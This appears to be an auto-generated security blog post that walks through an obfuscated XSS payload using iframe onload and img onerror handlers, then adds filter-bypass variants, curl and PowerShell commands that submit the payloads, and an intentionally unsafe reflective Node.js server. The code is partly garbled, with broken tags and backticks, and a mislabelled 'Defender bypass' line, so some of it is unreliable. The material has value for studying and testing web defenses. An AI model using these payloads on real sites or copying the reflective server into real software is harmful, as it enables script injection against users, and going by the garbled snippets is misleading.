Listen to this Post
The payload shared by Mark Green demonstrates a clever technique to trigger a JavaScript alert using obfuscated code within an HTML iframe and img tag. Let’s break down how this works:
< iframe/onload='this["src"]="javas	cript:al"+"ert<code>"';><img/src=q onerror='new Function`al\ert\`1\</code>'>
You Should Know:
Breaking Down the Payload
1. Iframe with onload event:
< iframe/onload='this["src"]="javas	cript:al"+"ert``"';>
– Uses HTML5 syntax that allows skipping space after tag name
– The `onload` event triggers JavaScript execution
– Obfuscates “javascript:” protocol by splitting it and using HTML entity ` `
– Combines string fragments to form `alert“`
2. Img tag with onerror event:
<img/src=q onerror='new Function<code>al\ert\</code>1``'>
– Uses invalid `src` attribute to trigger `onerror`
– Creates new Function with backtick template literal syntax
– Escapes characters to form `alert` function call
Practice-Verified Code Examples
Here are similar obfuscation techniques you can test:
1. Alternative alert triggering:
<div/onmouseover='window["al"+"ert"](1)'>Hover me</div>
2. Using String.fromCharCode:
<script> alert(String.fromCharCode(88,83,83)); </script>
3. Unicode obfuscation:
<script>
\u0061\u006c\u0065\u0072\u0074('XSS');
</script>
Security Implications
This technique demonstrates how attackers bypass security filters by:
– Using HTML5 flexible parsing
– Splitting keywords
– Utilizing alternative syntax
– Leveraging different event handlers
Testing Commands
For security professionals testing these payloads:
1. Linux command to test payloads:
curl -X POST http://test.site/xss-test -d "input= < iframe/onload='alert(1)'>"
2. Windows PowerShell test:
Invoke-WebRequest -Uri "http://test.site" -Body "search=<script>alert(1)</script>" -Method POST
3. Node.js test server:
const http = require('http');
http.createServer((req, res) => {
res.writeHead(200, {'Content-Type': 'text/html'});
res.end(req.url.slice(1)); // WARNING: UNSAFE for demo only
}).listen(8080);
What Undercode Say
This payload demonstrates advanced obfuscation techniques that bypass many naive XSS filters. Security professionals should be aware of:
1. HTML5 parsing quirks:
Check HTML5 parsing differences diff <(echo ' < iframe/onload=alert(1)>' | lynx -dump -stdin) <(echo ' < iframe onload=alert(1)>' | lynx -dump -stdin)
2. JavaScript obfuscation methods:
// Deobfuscation example const payload = "javas	cript:al"+"ert<code>"; const cleaned = payload.replace(/	/g, '\t').replace(/\u200b/g, ''); console.log(cleaned); // "javascript:alert</code>"
3. Filter bypass techniques:
Python filter bypass simulation import re payload = '<img/src=q onerror=alert(1)>' print(re.sub(r'onerror=', '', payload)) Naive filter fails
4. Browser testing commands:
Test in headless Chrome google-chrome --headless --disable-gpu --dump-dom 'data:text/html, < iframe/onload=alert(1)>'
5. Windows Defender bypass check:
Get-MpThreatDetection | Where-Object {$_.InitialDetectionTime -gt (Get-Date).AddHours(-24)}
Expected Output:
The payload successfully triggers a JavaScript alert through clever obfuscation techniques that bypass basic XSS filters, demonstrating the need for robust security measures in web applications.
References:
Reported By: Https: – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
